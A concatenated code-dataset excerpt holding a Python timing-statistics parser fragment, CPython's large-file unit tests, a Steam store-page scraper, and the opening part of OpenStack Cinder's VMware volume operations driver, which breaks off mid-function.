self.name = name
self.info = info
self.headers = None
self.rows = {}
self.total = None
self.errors = []
def addData(self, data):
assert len(data) > 0, "Empty data provided to section %s" % self.name
if self.headers is None:
self.headers = data
elif data[0] == "total":
self.total = int(data[1])
else:
key = None
rowdata = None
for i in range(0, len(data)):
try:
datum = int(data[i])
except:
datum = data[i]
if i == 0:
key = datum
elif i == 1:
rowdata = datum
else:
assert False, "Unexpected number of data: %r" % data
self.rows[key] = rowdata
def addError(self, txt):
self.errors.append(txt)
def summary(self):
ret = self.name + ": " + str(self.total)
return ret
#/Section
class Action:
# properties:
# description
# stack
# sections
# times
# errors
def __init__(self, desc, stack):
self.description = desc
self.stack = stack
self.sections = {}
self.times = []
self.errors = []
def addSection(self, section, timename):
if section.name == timename:
# Special handling of timing info
tmstr = section.info
assert tmstr is not None
tm = parse_time(tmstr)
self.times.append(tm)
elif section.name in self.sections:
sectlist = self.sections[section.name]
else:
sectlist = [section]
self.sections[section.name] = [section]
def avg_time(self):
tot = 0
cnt = 0
for tm in self.times:
tot += tm
cnt += 1
return float(tot) / cnt
def time_summary(self):
return self.description + ": " + str(self.avg_time()) + "ms\n"
def section_summary(self, key):
ret = ""
sects = self.sections[key]
for sect in sects:
ret += sect.summary() + "\n"
return ret
def addError(self, txt):
self.errors.append(txt)
def __str__(self):
ret = self.time_summary()
for key in self.sections:
ret += self.section_summary(key)
return ret
#/Action
class SourceVariant:
# properties:
# app
# descriptors
# actions
# errors
def __init__(self, app, desc):
self.app = app
self.descriptors = desc
self.actions = {}
self.errors = []
def getAction(self, desc, stack):
if desc in self.actions:
act = self.actions[desc]
# %%% Check that the stack matches.
else:
act = Action(desc, stack)
self.actions[desc] = act
return act
def descriptor(self):
return '.'.join(self.descriptors)
def addError(self, txt):
self.errors.append(txt)
def __str__(self):
ret = self.descriptor() + "\n"
for key in self.actions:
ret += self.actions[key].time_summary()
return ret
#/SourceVariant
class AppStats:
# properties:
# name
# variants
# errors
def __init__(self, appname):
self.name = appname
self.variants = {}
self.errors = []
def getVariant(self, descparts):
desc = '.'.join(descparts)
# Translate legacy descriptors.
if desc == 'original':
desc = 'input'
elif desc == 'original.modular':
desc = 'coarse.input'
elif desc == 'collapsed':
desc = 'semantic0.collapsed'
elif desc == 'transformed':
desc = 'semantic0.collapsed'
# %%% May want to match A.B to B.A
if desc not in self.variants:
self.variants[desc] = SourceVariant(self, descparts)
return self.variants[desc]
def addError(self, txt):
self.errors.append(txt)
def __str__(self):
# Pretty-print.
ret = self.name + "\n"
for key in self.variants:
ret += str(self.variant[key])
return ret
#/AppStats
def parse_time(tmstr):
if tmstr.endswith('ms'):
tmstr = tmstr[:-2]
conv = 1.0
elif tmstr.endswith('us'):
# Convert microseconds to fractional milliseconds.
tmstr = tmstr[:-2]
conv = 1.0 / 1000.0
elif tmstr.endswith('s'):
# Convert seconds to milliseconds.
tmstr = tmstr[:-1]
conv = 1000.0
else:
print >> sys.stderr, "Unspecified time unit, assuming ms: %s" % tmstr
conv = 1.0
tm = float(tmstr) * conv
return tm
|
bsd-3-clause
|
tempbottle/kbengine
|
kbe/src/lib/python/Lib/test/test_largefile.py
|
96
|
6554
|
"""Test largefile support on system where this makes sense.
"""
import os
import stat
import sys
import unittest
from test.support import TESTFN, requires, unlink
import io # C implementation of io
import _pyio as pyio # Python implementation of io
# size of file to create (>2GB; 2GB == 2147483648 bytes)
size = 2500000000
class LargeFileTest:
"""Test that each file function works as expected for large
(i.e. > 2GB) files.
"""
def setUp(self):
if os.path.exists(TESTFN):
mode = 'r+b'
else:
mode = 'w+b'
with self.open(TESTFN, mode) as f:
current_size = os.fstat(f.fileno())[stat.ST_SIZE]
if current_size == size+1:
return
if current_size == 0:
f.write(b'z')
f.seek(0)
f.seek(size)
f.write(b'a')
f.flush()
self.assertEqual(os.fstat(f.fileno())[stat.ST_SIZE], size+1)
@classmethod
def tearDownClass(cls):
with cls.open(TESTFN, 'wb'):
pass
if not os.stat(TESTFN)[stat.ST_SIZE] == 0:
raise cls.failureException('File was not truncated by opening '
'with mode "wb"')
def test_osstat(self):
self.assertEqual(os.stat(TESTFN)[stat.ST_SIZE], size+1)
def test_seek_read(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
f.seek(0)
self.assertEqual(f.tell(), 0)
f.seek(0, 0)
self.assertEqual(f.tell(), 0)
f.seek(42)
self.assertEqual(f.tell(), 42)
f.seek(42, 0)
self.assertEqual(f.tell(), 42)
f.seek(42, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 2) # seek from the end
self.assertEqual(f.tell(), size + 1 + 0)
f.seek(-10, 2)
self.assertEqual(f.tell(), size + 1 - 10)
f.seek(-size-1, 2)
self.assertEqual(f.tell(), 0)
f.seek(size)
self.assertEqual(f.tell(), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
f.seek(-size-1, 1)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
def test_lseek(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(os.lseek(f.fileno(), 0, 0), 0)
self.assertEqual(os.lseek(f.fileno(), 42, 0), 42)
self.assertEqual(os.lseek(f.fileno(), 42, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 2), size+1+0)
self.assertEqual(os.lseek(f.fileno(), -10, 2), size+1-10)
self.assertEqual(os.lseek(f.fileno(), -size-1, 2), 0)
self.assertEqual(os.lseek(f.fileno(), size, 0), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
def test_truncate(self):
with self.open(TESTFN, 'r+b') as f:
if not hasattr(f, 'truncate'):
raise unittest.SkipTest("open().truncate() not available "
"on this system")
f.seek(0, 2)
# else we've lost track of the true size
self.assertEqual(f.tell(), size+1)
# Cut it back via seek + truncate with no argument.
newsize = size - 10
f.seek(newsize)
f.truncate()
self.assertEqual(f.tell(), newsize) # else pointer moved
f.seek(0, 2)
self.assertEqual(f.tell(), newsize) # else wasn't truncated
# Ensure that truncate(smaller than true size) shrinks
# the file.
newsize -= 1
f.seek(42)
f.truncate(newsize)
self.assertEqual(f.tell(), 42)
f.seek(0, 2)
self.assertEqual(f.tell(), newsize)
# XXX truncate(larger than true size) is ill-defined
# across platform; cut it waaaaay back
f.seek(0)
f.truncate(1)
self.assertEqual(f.tell(), 0) # else pointer moved
f.seek(0)
self.assertEqual(len(f.read()), 1) # else wasn't truncated
def test_seekable(self):
# Issue #5016; seekable() can return False when the current position
# is negative when truncated to an int.
for pos in (2**31-1, 2**31, 2**31+1):
with self.open(TESTFN, 'rb') as f:
f.seek(pos)
self.assertTrue(f.seekable())
def setUpModule():
try:
import signal
# The default handler for SIGXFSZ is to abort the process.
# By ignoring it, system calls exceeding the file size resource
# limit will raise OSError instead of crashing the interpreter.
signal.signal(signal.SIGXFSZ, signal.SIG_IGN)
except (ImportError, AttributeError):
pass
# On Windows and Mac OSX this test comsumes large resources; It
# takes a long time to build the >2GB file and takes >2GB of disk
# space therefore the resource must be enabled to run this test.
# If not, nothing after this line stanza will be executed.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
requires('largefile',
'test requires %s bytes and a long time to run' % str(size))
else:
# Only run if the current filesystem supports large files.
# (Skip this test on Windows, since we now always support
# large files.)
f = open(TESTFN, 'wb', buffering=0)
try:
# 2**31 == 2147483648
f.seek(2147483649)
# Seeking is not enough of a test: you must write and flush, too!
f.write(b'x')
f.flush()
except (OSError, OverflowError):
raise unittest.SkipTest("filesystem does not have "
"largefile support")
finally:
f.close()
unlink(TESTFN)
class CLargeFileTest(LargeFileTest, unittest.TestCase):
open = staticmethod(io.open)
class PyLargeFileTest(LargeFileTest, unittest.TestCase):
open = staticmethod(pyio.open)
def tearDownModule():
unlink(TESTFN)
if __name__ == '__main__':
unittest.main()
|
lgpl-3.0
|
herrniemand/KiwiPycon2015
|
parser.py
|
1
|
3197
|
from bs4 import BeautifulSoup
import re
def clean( content, form ):
expressions = {
'tabs' : r'[\n|\t|\r]',
'numbers' : r'[^0-9\.]'
}
regex = re.compile(expressions[form])
return regex.sub('', content)
def prepare( data ):
soup = BeautifulSoup(data, 'html.parser')
if not 'Site Error' in soup.find('title').text:
game = {
'appid' : 0,
'name' : soup.find('div', {'class': 'apphub_AppName'}),
'price' : soup.find('div', {'class': 'game_purchase_price price'}),
'currency' : soup.find('div', {'class': 'game_purchase_price price'}),
'tags' : soup.find_all('a', {'class': 'app_tag'}),
'rating' : {
'count' : soup.find('meta', { 'itemprop' : 'ratingValue' }),
'total' : soup.find('meta', { 'itemprop' : 'reviewCount' })
}
}
try:
game['details_block'] = [(i.parent.b.contents[0],i.contents[0]) for i in soup.find('div', {'class' : 'details_block'}).find_all('a')]
except:
game['details_block'] = None #Some pages don't have a details block
return game
def cook( data ):
def name( item ):
if item != None:
return clean(item.text, 'tabs')
else:
return ''
def price( item ):
if item != None:
if 'Free to play' in item.text:
return 0.0
else:
return clean(item.text, 'numbers')
else:
return 0.0
def currency( item ):
if item != None:
if 'Free to play' in item.text:
return ''
else:
return re.findall(r'[A-Za-z]*[$ยขยฃยคยฅึุเงฒเงณเงปเซฑเฏนเธฟแโฌ]', item.text)
else:
return ''
def rating( item ):
if item != None:
return item['content']
else:
return 0
def genre( item ):
genres = []
if item != None:
for thing in item:
if 'Genre' in thing[0] and len(thing) == 2:
genres.append(thing[1])
return genres
return []
def publisher( item ):
if item != None:
for thing in item:
if 'Publisher' in thing[0] and len(thing) == 2:
return thing[1]
return ''
def developer( item ):
if item != None:
for thing in item:
if 'Developer' in thing[0] and len(thing) == 2:
return thing[1]
return ''
game = {
'appid' : data['appid'],
'name' : name(data['name']),
'price' : price(data['price']),
'currency' : currency(data['currency']),
'tags' : [ clean(tag.text, 'tabs') for tag in data['tags'] ],
'rating' : {
'total' : rating(data['rating']['total']),
'count' : rating(data['rating']['count'])
},
'genre' : genre(data['details_block']),
'publisher' : publisher(data['details_block']),
'developer' : developer(data['details_block'])
}
return game
|
mit
|
Datera/cinder
|
cinder/volume/drivers/vmware/volumeops.py
|
3
|
82850
|
# Copyright (c) 2013 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Implements operations on volumes residing on VMware datastores.
"""
from oslo_log import log as logging
from oslo_utils import units
from oslo_vmware import exceptions
from oslo_vmware.objects import datastore as ds_obj
from oslo_vmware import vim_util
import six
from six.moves import urllib
from cinder.i18n import _
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
LOG = logging.getLogger(__name__)
LINKED_CLONE_TYPE = 'linked'
FULL_CLONE_TYPE = 'full'
BACKING_UUID_KEY = 'instanceUuid'
def split_datastore_path(datastore_path):
"""Split the datastore path to components.
return the datastore name, relative folder path and the file name
E.g. datastore_path = [datastore1] my_volume/my_volume.vmdk, returns
(datastore1, my_volume/, my_volume.vmdk)
:param datastore_path: Datastore path of a file
:return: Parsed datastore name, relative folder path and file name
"""
splits = datastore_path.split('[', 1)[1].split(']', 1)
datastore_name = None
folder_path = None
file_name = None
if len(splits) == 1:
datastore_name = splits[0]
else:
datastore_name, path = splits
# Path will be of form my_volume/my_volume.vmdk
# we need into my_volumes/ and my_volume.vmdk
splits = path.split('/')
file_name = splits[len(splits) - 1]
folder_path = path[:-len(file_name)]
return (datastore_name.strip(), folder_path.strip(), file_name.strip())
class VirtualDiskPath(object):
"""Class representing paths of files comprising a virtual disk."""
def __init__(self, ds_name, folder_path, disk_name):
"""Creates path object for the given disk.
:param ds_name: name of the datastore where disk is stored
:param folder_path: absolute path of the folder containing the disk
:param disk_name: name of the virtual disk
"""
self._descriptor_file_path = "%s%s.vmdk" % (folder_path, disk_name)
self._descriptor_ds_file_path = self.get_datastore_file_path(
ds_name, self._descriptor_file_path)
def get_datastore_file_path(self, ds_name, file_path):
"""Get datastore path corresponding to the given file path.
:param ds_name: name of the datastore containing the file represented
by the given file path
:param file_path: absolute path of the file
:return: datastore file path
"""
return "[%s] %s" % (ds_name, file_path)
def get_descriptor_file_path(self):
"""Get absolute file path of the virtual disk descriptor."""
return self._descriptor_file_path
def get_descriptor_ds_file_path(self):
"""Get datastore file path of the virtual disk descriptor."""
return self._descriptor_ds_file_path
class FlatExtentVirtualDiskPath(VirtualDiskPath):
"""Paths of files in a non-monolithic disk with a single flat extent."""
def __init__(self, ds_name, folder_path, disk_name):
"""Creates path object for the given disk.
:param ds_name: name of the datastore where disk is stored
:param folder_path: absolute path of the folder containing the disk
:param disk_name: name of the virtual disk
"""
super(FlatExtentVirtualDiskPath, self).__init__(
ds_name, folder_path, disk_name)
self._flat_extent_file_path = "%s%s-flat.vmdk" % (folder_path,
disk_name)
self._flat_extent_ds_file_path = self.get_datastore_file_path(
ds_name, self._flat_extent_file_path)
def get_flat_extent_file_path(self):
"""Get absolute file path of the flat extent."""
return self._flat_extent_file_path
def get_flat_extent_ds_file_path(self):
"""Get datastore file path of the flat extent."""
return self._flat_extent_ds_file_path
class MonolithicSparseVirtualDiskPath(VirtualDiskPath):
"""Paths of file comprising a monolithic sparse disk."""
pass
class VirtualDiskType(object):
"""Supported virtual disk types."""
EAGER_ZEROED_THICK = "eagerZeroedThick"
PREALLOCATED = "preallocated"
THIN = "thin"
# thick in extra_spec means lazy-zeroed thick disk
EXTRA_SPEC_DISK_TYPE_DICT = {'eagerZeroedThick': EAGER_ZEROED_THICK,
'thick': PREALLOCATED,
'thin': THIN
}
@staticmethod
def is_valid(extra_spec_disk_type):
"""Check if the given disk type in extra_spec is valid.
:param extra_spec_disk_type: disk type in extra_spec
:return: True if valid
"""
return (extra_spec_disk_type in
VirtualDiskType.EXTRA_SPEC_DISK_TYPE_DICT)
@staticmethod
def validate(extra_spec_disk_type):
"""Validate the given disk type in extra_spec.
This method throws an instance of InvalidDiskTypeException if the given
disk type is invalid.
:param extra_spec_disk_type: disk type in extra_spec
:raises: InvalidDiskTypeException
"""
if not VirtualDiskType.is_valid(extra_spec_disk_type):
raise vmdk_exceptions.InvalidDiskTypeException(
disk_type=extra_spec_disk_type)
@staticmethod
def get_virtual_disk_type(extra_spec_disk_type):
"""Return disk type corresponding to the extra_spec disk type.
:param extra_spec_disk_type: disk type in extra_spec
:return: virtual disk type
:raises: InvalidDiskTypeException
"""
VirtualDiskType.validate(extra_spec_disk_type)
return (VirtualDiskType.EXTRA_SPEC_DISK_TYPE_DICT[
extra_spec_disk_type])
class VirtualDiskAdapterType(object):
"""Supported virtual disk adapter types."""
LSI_LOGIC = "lsiLogic"
BUS_LOGIC = "busLogic"
LSI_LOGIC_SAS = "lsiLogicsas"
PARA_VIRTUAL = "paraVirtual"
IDE = "ide"
@staticmethod
def is_valid(adapter_type):
"""Check if the given adapter type is valid.
:param adapter_type: adapter type to check
:return: True if valid
"""
return adapter_type in [VirtualDiskAdapterType.LSI_LOGIC,
VirtualDiskAdapterType.BUS_LOGIC,
VirtualDiskAdapterType.LSI_LOGIC_SAS,
VirtualDiskAdapterType.PARA_VIRTUAL,
VirtualDiskAdapterType.IDE]
@staticmethod
def validate(extra_spec_adapter_type):
"""Validate the given adapter type in extra_spec.
This method throws an instance of InvalidAdapterTypeException if the
given adapter type is invalid.
:param extra_spec_adapter_type: adapter type in extra_spec
:raises: InvalidAdapterTypeException
"""
if not VirtualDiskAdapterType.is_valid(extra_spec_adapter_type):
raise vmdk_exceptions.InvalidAdapterTypeException(
invalid_type=extra_spec_adapter_type)
@staticmethod
def get_adapter_type(extra_spec_adapter):
"""Get the adapter type to be used in VirtualDiskSpec.
:param extra_spec_adapter: adapter type in the extra_spec
:return: adapter type to be used in VirtualDiskSpec
"""
VirtualDiskAdapterType.validate(extra_spec_adapter)
# We set the adapter type as lsiLogic for lsiLogicsas/paraVirtual
# since it is not supported by VirtualDiskManager APIs. This won't
# be a problem because we attach the virtual disk to the correct
# controller type and the disk adapter type is always resolved using
# its controller key.
if (extra_spec_adapter == VirtualDiskAdapterType.LSI_LOGIC_SAS or
extra_spec_adapter == VirtualDiskAdapterType.PARA_VIRTUAL):
return VirtualDiskAdapterType.LSI_LOGIC
else:
return extra_spec_adapter
class ControllerType(object):
"""Encapsulate various controller types."""
LSI_LOGIC = 'VirtualLsiLogicController'
BUS_LOGIC = 'VirtualBusLogicController'
LSI_LOGIC_SAS = 'VirtualLsiLogicSASController'
PARA_VIRTUAL = 'ParaVirtualSCSIController'
IDE = 'VirtualIDEController'
CONTROLLER_TYPE_DICT = {
VirtualDiskAdapterType.LSI_LOGIC: LSI_LOGIC,
VirtualDiskAdapterType.BUS_LOGIC: BUS_LOGIC,
VirtualDiskAdapterType.LSI_LOGIC_SAS: LSI_LOGIC_SAS,
VirtualDiskAdapterType.PARA_VIRTUAL: PARA_VIRTUAL,
VirtualDiskAdapterType.IDE: IDE}
@staticmethod
def get_controller_type(adapter_type):
"""Get the disk controller type based on the given adapter type.
:param adapter_type: disk adapter type
:return: controller type corresponding to the given adapter type
:raises: InvalidAdapterTypeException
"""
if adapter_type in ControllerType.CONTROLLER_TYPE_DICT:
return ControllerType.CONTROLLER_TYPE_DICT[adapter_type]
raise vmdk_exceptions.InvalidAdapterTypeException(
invalid_type=adapter_type)
@staticmethod
def is_scsi_controller(controller_type):
"""Check if the given controller is a SCSI controller.
:param controller_type: controller type
:return: True if the controller is a SCSI controller
"""
return controller_type in [ControllerType.LSI_LOGIC,
ControllerType.BUS_LOGIC,
ControllerType.LSI_LOGIC_SAS,
ControllerType.PARA_VIRTUAL]
class VMwareVolumeOps(object):
"""Manages volume operations."""
def __init__(self, session, max_objects, extension_key, extension_type):
self._session = session
self._max_objects = max_objects
self._extension_key = extension_key
self._extension_type = extension_type
self._folder_cache = {}
self._backing_ref_cache = {}
self._vmx_version = None
def set_vmx_version(self, vmx_version):
self._vmx_version = vmx_version
def get_backing(self, name, backing_uuid):
"""Get the backing based on name or uuid.
:param name: Name of the backing
:param backing_uuid: UUID of the backing
:return: Managed object reference to the backing
"""
ref = self.get_backing_by_uuid(backing_uuid)
if not ref:
# old version of the driver might have created this backing and
# hence cannot be queried by uuid
LOG.debug("Returning cached ref for %s.", name)
ref = self._backing_ref_cache.get(name)
LOG.debug("Backing (%(name)s, %(uuid)s) ref: %(ref)s.",
{'name': name, 'uuid': backing_uuid, 'ref': ref})
return ref
def get_backing_by_uuid(self, uuid):
LOG.debug("Get ref by UUID: %s.", uuid)
result = self._session.invoke_api(
self._session.vim,
'FindAllByUuid',
self._session.vim.service_content.searchIndex,
uuid=uuid,
vmSearch=True,
instanceUuid=True)
if result:
return result[0]
def build_backing_ref_cache(self, name_regex=None):
LOG.debug("Building backing ref cache.")
result = self._session.invoke_api(
vim_util,
'get_objects',
self._session.vim,
'VirtualMachine',
self._max_objects,
properties_to_collect=[
'name',
'config.instanceUuid',
'config.extraConfig["cinder.volume.id"]'])
while result:
for backing in result.objects:
instance_uuid = None
vol_id = None
for prop in backing.propSet:
if prop.name == 'name':
name = prop.val
elif prop.name == 'config.instanceUuid':
instance_uuid = prop.val
else:
vol_id = prop.val.value
if name_regex and not name_regex.match(name):
continue
if instance_uuid and instance_uuid == vol_id:
# no need to cache backing with UUID set to volume ID
continue
self._backing_ref_cache[name] = backing.obj
result = self.continue_retrieval(result)
LOG.debug("Backing ref cache size: %d.", len(self._backing_ref_cache))
def delete_backing(self, backing):
"""Delete the backing.
:param backing: Managed object reference to the backing
"""
LOG.debug("Deleting the VM backing: %s.", backing)
task = self._session.invoke_api(self._session.vim, 'Destroy_Task',
backing)
LOG.debug("Initiated deletion of VM backing: %s.", backing)
self._session.wait_for_task(task)
LOG.info("Deleted the VM backing: %s.", backing)
# TODO(kartikaditya) Keep the methods not specific to volume in
# a different file
def get_host(self, instance):
"""Get host under which instance is present.
:param instance: Managed object reference of the instance VM
:return: Host managing the instance VM
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, instance,
'runtime.host')
def get_hosts(self):
"""Get all host from the inventory.
:return: All the hosts from the inventory
"""
return self._session.invoke_api(vim_util, 'get_objects',
self._session.vim,
'HostSystem', self._max_objects)
def continue_retrieval(self, retrieve_result):
"""Continue retrieval of results if necessary.
:param retrieve_result: Result from RetrievePropertiesEx
"""
return self._session.invoke_api(vim_util, 'continue_retrieval',
self._session.vim, retrieve_result)
def cancel_retrieval(self, retrieve_result):
"""Cancel retrieval of results if necessary.
:param retrieve_result: Result from RetrievePropertiesEx
"""
self._session.invoke_api(vim_util, 'cancel_retrieval',
self._session.vim, retrieve_result)
# TODO(vbala): move this method to datastore module
def _is_usable(self, mount_info):
"""Check if a datastore is usable as per the given mount info.
The datastore is considered to be usable for a host only if it is
writable, mounted and accessible.
:param mount_info: Host mount information
:return: True if datastore is usable
"""
writable = mount_info.accessMode == 'readWrite'
# If mounted attribute is not set, then default is True
mounted = getattr(mount_info, 'mounted', True)
# If accessible attribute is not set, then default is False
accessible = getattr(mount_info, 'accessible', False)
return writable and mounted and accessible
def get_connected_hosts(self, datastore):
"""Get all the hosts to which the datastore is connected and usable.
The datastore is considered to be usable for a host only if it is
writable, mounted and accessible.
:param datastore: Reference to the datastore entity
:return: List of managed object references of all connected
hosts
"""
summary = self.get_summary(datastore)
if not summary.accessible:
return []
host_mounts = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, datastore,
'host')
if not hasattr(host_mounts, 'DatastoreHostMount'):
return []
connected_hosts = []
for host_mount in host_mounts.DatastoreHostMount:
if self._is_usable(host_mount.mountInfo):
connected_hosts.append(host_mount.key.value)
return connected_hosts
def is_datastore_accessible(self, datastore, host):
"""Check if the datastore is accessible to the given host.
:param datastore: datastore reference
:return: True if the datastore is accessible
"""
hosts = self.get_connected_hosts(datastore)
return host.value in hosts
# TODO(vbala): move this method to datastore module
def _in_maintenance(self, summary):
"""Check if a datastore is entering maintenance or in maintenance.
:param summary: Summary information about the datastore
:return: True if the datastore is entering maintenance or in
maintenance
"""
if hasattr(summary, 'maintenanceMode'):
return summary.maintenanceMode in ['enteringMaintenance',
'inMaintenance']
return False
def _get_parent(self, child, parent_type):
"""Get immediate parent of given type via 'parent' property.
:param child: Child entity reference
:param parent_type: Entity type of the parent
:return: Immediate parent of specific type up the hierarchy via
'parent' property
"""
if not child:
return None
if child._type == parent_type:
return child
parent = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, child, 'parent')
return self._get_parent(parent, parent_type)
def get_dc(self, child):
"""Get parent datacenter up the hierarchy via 'parent' property.
:param child: Reference of the child entity
:return: Parent Datacenter of the param child entity
"""
return self._get_parent(child, 'Datacenter')
def get_vmfolder(self, datacenter):
"""Get the vmFolder.
:param datacenter: Reference to the datacenter entity
:return: vmFolder property of the datacenter
"""
return self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, datacenter,
'vmFolder')
def _get_child_folder(self, parent_folder, child_folder_name):
LOG.debug("Finding child folder: %s.", child_folder_name)
# Get list of child entities for the parent folder
prop_val = self._session.invoke_api(vim_util, 'get_object_property',
self._session.vim, parent_folder,
'childEntity')
if prop_val and hasattr(prop_val, 'ManagedObjectReference'):
child_entities = prop_val.ManagedObjectReference
# Return if the child folder with input name is already present
for child_entity in child_entities:
if child_entity._type != 'Folder':
continue
child_entity_name = self.get_entity_name(child_entity)
if (child_entity_name
and (urllib.parse.unquote(child_entity_name)
== child_folder_name)):
return child_entity
def create_folder(self, parent_folder, child_folder_name):
"""Creates child folder under the given parent folder.
:param parent_folder: Reference to the parent folder
:param child_folder_name: Name of the child folder
:return: Reference to the child folder
"""
LOG.debug("Creating folder: %(child_folder_name)s under parent "
"folder: %(parent_folder)s.",
{'child_folder_name': child_folder_name,
'parent_folder': parent_folder})
try:
child_folder = self._session.invoke_api(self._session.vim,
'CreateFolder',
parent_folder,
name=child_folder_name)
LOG.debug("Created child folder: %s.", child_folder)
except exceptions.DuplicateName:
# Another thread is trying to create the same folder, ignore
# the exception.
LOG.debug('Folder: %s already exists.', child_folder_name)
child_folder = self._get_child_folder(parent_folder,
child_folder_name)
return child_folder
def create_vm_inventory_folder(self, datacenter, path_comp):
"""Create and return a VM inventory folder.
This method caches references to inventory folders returned.
:param datacenter: Reference to datacenter
:param path_comp: Path components as a list
"""
LOG.debug("Creating inventory folder: %(path_comp)s under VM folder "
"of datacenter: %(datacenter)s.",
{'path_comp': path_comp,
'datacenter': datacenter})
path = "/" + datacenter.value
parent = self._folder_cache.get(path)
if not parent:
parent = self.get_vmfolder(datacenter)
self._folder_cache[path] = parent
folder = None
for folder_name in path_comp:
path = "/".join([path, folder_name])
folder = self._folder_cache.get(path)
if not folder:
folder = self.create_folder(parent, folder_name)
self._folder_cache[path] = folder
parent = folder
LOG.debug("Inventory folder for path: %(path)s is %(folder)s.",
{'path': path,
'folder': folder})
return folder
def extend_virtual_disk(self, requested_size_in_gb, path, dc_ref,
eager_zero=False):
"""Extend the virtual disk to the requested size.
:param requested_size_in_gb: Size of the volume in GB
:param path: Datastore path of the virtual disk to extend
:param dc_ref: Reference to datacenter
:param eager_zero: Boolean determining if the free space
is zeroed out
"""
LOG.debug("Extending virtual disk: %(path)s to %(size)s GB.",
{'path': path, 'size': requested_size_in_gb})
diskMgr = self._session.vim.service_content.virtualDiskManager
# VMWare API needs the capacity unit to be in KB, so convert the
# capacity unit from GB to KB.
size_in_kb = requested_size_in_gb * units.Mi
task = self._session.invoke_api(self._session.vim,
"ExtendVirtualDisk_Task",
diskMgr,
name=path,
datacenter=dc_ref,
newCapacityKb=size_in_kb,
eagerZero=eager_zero)
self._session.wait_for_task(task)
LOG.info("Successfully extended virtual disk: %(path)s to "
"%(size)s GB.",
{'path': path, 'size': requested_size_in_gb})
def _create_controller_config_spec(self, adapter_type):
"""Returns config spec for adding a disk controller."""
cf = self._session.vim.client.factory
controller_type = ControllerType.get_controller_type(adapter_type)
controller_device = cf.create('ns0:%s' % controller_type)
controller_device.key = -100
controller_device.busNumber = 0
if ControllerType.is_scsi_controller(controller_type):
controller_device.sharedBus = 'noSharing'
controller_spec = cf.create('ns0:VirtualDeviceConfigSpec')
controller_spec.operation = 'add'
controller_spec.device = controller_device
return controller_spec
def _create_disk_backing(self, disk_type, vmdk_ds_file_path):
"""Creates file backing for virtual disk."""
cf = self._session.vim.client.factory
disk_device_bkng = cf.create('ns0:VirtualDiskFlatVer2BackingInfo')
if disk_type == VirtualDiskType.EAGER_ZEROED_THICK:
disk_device_bkng.eagerlyScrub = True
elif disk_type == VirtualDiskType.THIN:
disk_device_bkng.thinProvisioned = True
disk_device_bkng.fileName = vmdk_ds_file_path or ''
disk_device_bkng.diskMode = 'persistent'
return disk_device_bkng
def _create_virtual_disk_config_spec(self, size_kb, disk_type,
controller_key, profile_id,
vmdk_ds_file_path):
"""Returns config spec for adding a virtual disk."""
cf = self._session.vim.client.factory
disk_device = cf.create('ns0:VirtualDisk')
# disk size should be at least 1024KB
disk_device.capacityInKB = max(units.Ki, int(size_kb))
if controller_key < 0:
disk_device.key = controller_key - 1
else:
disk_device.key = -101
disk_device.unitNumber = 0
disk_device.controllerKey = controller_key
disk_device.backing = self._create_disk_backing(disk_type,
vmdk_ds_file_path)
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.operation = 'add'
if vmdk_ds_file_path is None:
disk_spec.fileOperation = 'create'
disk_spec.device = disk_device
if profile_id:
disk_profile = cf.create('ns0:VirtualMachineDefinedProfileSpec')
disk_profile.profileId = profile_id
disk_spec.profile = [disk_profile]
return disk_spec
def _create_specs_for_disk_add(self, size_kb, disk_type, adapter_type,
profile_id, vmdk_ds_file_path=None):
"""Create controller and disk config specs for adding a new disk.
:param size_kb: disk size in KB
:param disk_type: disk provisioning type
:param adapter_type: disk adapter type
:param profile_id: storage policy profile identification
:param vmdk_ds_file_path: Optional datastore file path of an existing
virtual disk. If specified, file backing is
not created for the virtual disk.
:return: list containing controller and disk config specs
"""
controller_spec = None
if adapter_type == 'ide':
# For IDE disks, use one of the default IDE controllers (with keys
# 200 and 201) created as part of backing VM creation.
controller_key = 200
else:
controller_spec = self._create_controller_config_spec(adapter_type)
controller_key = controller_spec.device.key
disk_spec = self._create_virtual_disk_config_spec(size_kb,
disk_type,
controller_key,
profile_id,
vmdk_ds_file_path)
specs = [disk_spec]
if controller_spec is not None:
specs.append(controller_spec)
return specs
def _get_extra_config_option_values(self, extra_config):
cf = self._session.vim.client.factory
option_values = []
for key, value in extra_config.items():
opt = cf.create('ns0:OptionValue')
opt.key = key
opt.value = value
option_values.append(opt)
return option_values
def _create_managed_by_info(self):
managed_by = self._session.vim.client.factory.create(
'ns0:ManagedByInfo')
managed_by.extensionKey = self._extension_key
managed_by.type = self._extension_type
return managed_by
def _get_create_spec_disk_less(self, name, ds_name, profileId=None,
extra_config=None):
"""Return spec for creating disk-less backing.
:param name: Name of the backing
:param ds_name: Datastore name where the disk is to be provisioned
:param profileId: Storage profile ID for the backing
:param extra_config: Key-value pairs to be written to backing's
extra-config
:return: Spec for creation
"""
cf = self._session.vim.client.factory
vm_file_info = cf.create('ns0:VirtualMachineFileInfo')
vm_file_info.vmPathName = '[%s]' % ds_name
create_spec = cf.create('ns0:VirtualMachineConfigSpec')
create_spec.name = name
create_spec.guestId = 'otherGuest'
create_spec.numCPUs = 1
